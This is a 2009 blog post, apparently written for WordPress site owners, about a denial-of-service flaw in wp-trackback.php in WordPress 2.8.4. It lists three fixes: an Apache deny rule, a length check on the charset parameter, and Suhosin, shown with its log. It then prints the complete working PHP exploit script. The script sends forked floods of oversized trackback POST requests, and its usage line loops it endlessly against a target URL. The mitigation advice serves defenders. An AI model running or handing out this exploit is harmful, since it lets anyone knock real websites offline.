The news I picked up from this thread is that an exploit has been found for WordPress 2.8.4. It is a DoS (Denial of Service) exploit: it keeps sending oversized requests to the server until the server is overloaded. The exploit takes advantage of a weakness in wp-trackback.php.
Solutions

Solution 1 (the crudest): add the following rules to the Apache configuration (httpd.conf). Note that this blocks every request to wp-trackback.php, so the site will no longer receive trackbacks at all:

```apache
<Files ~ "wp-trackback.php">
Order allow,deny
Deny from all
</Files>
```
Solution 2: at line 47 of wp-trackback.php add

```php
if(strlen($charset) > 50)
    die;
```
Solution 3: install Suhosin. From my tests, Suhosin has more or less been shown to block this attack. Here is the Suhosin log output:

Oct 21 12:17:27 server suhosin[26063]: ALERT - configured request variable value length limit exceeded - dropped variable 'title' (attacker '64.243.53.34', file '/home/domainku/domains/domainku.com/public_html/wp-trackback.php')
Here is the exploit script:
```php
<?php
/*
 * wordpress Resource exhaustion Exploit
 * http://rooibo.wordpress.com/
 * security@wordpress.org contacted and get a response,
 * but no solution available.
 *
 * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org
 *
 * exploiting:
 * you must install php-cli (command line interface)
 * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
 *
 */
if(count($argv) < 2) die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2) die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/') $path = '/'.$path;
$b = "";
$b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n <= 5; $n++){
    $fp = @fsockopen($data['host'],80);
    if(!$fp) die("unable to connect to: ".$data['host']."\n");
    $pid[$n] = pcntl_fork();
    if(!$pid[$n]){
        fputs($fp, "POST $path HTTP/1.1\r\n");
        fputs($fp, "Host: ".$data['host']."\r\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: ".strlen($str)."\r\n");
        fputs($fp, "Connection: close\r\n\r\n");
        fputs($fp, $str."\r\n\r\n");
        echo "hit!\n";
    }
}
?>
```
Sources:
http://www.diskusiwebhosting.com/showthread.php?t=1784
http://jarraltech.com/2009/10/new-0-day-wordpress-exploit/

October 24th, 2009 at 12:27 am
[...] to 2.8.5. The WordPress upgrade is meant to close the security hole that was successfully used by the 0-day exploit to perform a DDoS on [...]
October 24th, 2009 at 1:33 am
Keep up the good work, mas Hadi…
October 27th, 2009 at 10:57 pm
Will do, boss.